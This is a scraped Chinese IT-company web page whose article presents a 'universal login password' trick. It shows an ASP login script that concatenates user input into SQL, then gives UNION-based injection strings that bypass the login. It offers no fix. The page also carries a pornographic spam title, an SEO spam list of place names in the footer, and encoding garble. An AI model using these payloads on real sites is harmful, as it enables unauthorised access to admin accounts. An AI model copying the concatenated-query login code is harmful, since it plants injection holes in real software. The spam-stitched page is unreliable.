午夜直播免费看-亚洲国产精品日韩av不卡在线-少妇三级全黄-欧美日韩国产一区二区三区,

 
 
 
首 頁
下載中心
站內(nèi)搜索
IT學(xué)堂│News center
硬件學(xué)堂
軟件學(xué)堂
網(wǎng)絡(luò)學(xué)堂
最新公告│Announcement
IT外包首選我們的八大理由...
中國勞科院與我公司續(xù)簽了...
感謝中成航宇與我們公司續(xù)...
感謝深圳市城市空間規(guī)劃建...
 
詳細(xì)內(nèi)容
當(dāng)前位置:首 頁 >> IT學(xué)堂 >> 詳細(xì)內(nèi)容
 
 
詳細(xì)內(nèi)容  
 
 
新型萬能登錄密碼
發(fā)布時(shí)間:2012-12-20 | 點(diǎn)擊次數(shù):2315
  
 
    網(wǎng)上有很多這樣的登陸驗(yàn)證代碼
  <%
  username=trim(Request.Form("username"))
  password=trim(Request.Form("password"))
  sql="Select * FROM admin Where user='"&username&"'"
  Set rs=Server.CreateObject("adodb.recordset")
  rs.Open sql,conn,1,1
  if rs.eof then
  checksysUser=FALSE
  else
  passwd=trim(rs("pwd"))
  if passwd=password then
  Session("admin")=username
  checksysUser=TRUE
  else
  checksysUser=FALSE
  end if
  End if
  rs.close
  conn.close
  if checksysUser=true then
  Response.Redirect("main.asp")
  else
  errmsg="<font color=#FF0000><b>用戶名輸入有誤,請重新輸入!</b></font>"
  end if
  %>
  先在數(shù)據(jù)庫中查詢用戶名對(duì)應(yīng)的密碼,然后再和用戶輸入的密碼對(duì)比,導(dǎo)致'or'='or'這樣的萬能登陸密碼失
  效.但如果在上面的程序中,用戶名輸入' union   select 1,1,1 FROM admin Where ''=',密碼輸入1,就可以登陸成功,原理很簡單,就不多說了.順便附上oldjun的語句:' union   select 1,1,1 AS pwd FROM admin Where ''=  
編輯:北京信誠IT保姆IT外包部 http:// www.aboverow.cn www.xcit.com.cn
 
關(guān)閉
  友情鏈接
深圳無線覆蓋 廣信鴻業(yè) 昊瑞爾科技 及好科技 信諾IT服務(wù) 北京IT外包 無線覆蓋 起秀網(wǎng)絡(luò)
版權(quán)所有:北京信誠眾業(yè)科技有限公司 總部:010-62075251 400-698-1290 技術(shù)支持:010-62365952
地址:北京市北三環(huán)中路2號(hào)匯鑫祥源大廈328室 京ICP備09096604-3號(hào)

 

主站蜘蛛池模板: 永康市| 武义县| 哈巴河县| 漯河市| 鄢陵县| 濉溪县| 朝阳县| 承德市| 元阳县| 防城港市| 南陵县| 容城县| 清丰县| 冷水江市| 朔州市| 紫金县| 大同市| 洛宁县| 大方县| 名山县| 沾益县| 云林县| 灌南县| 丹江口市| 奇台县| 丰原市| 三都| 呼伦贝尔市| 乌拉特后旗| 讷河市| 澄江县| 宁海县| 额尔古纳市| 黄浦区| 江西省| 金华市| 深水埗区| 巴马| 青铜峡市| 涟水县| 罗甸县|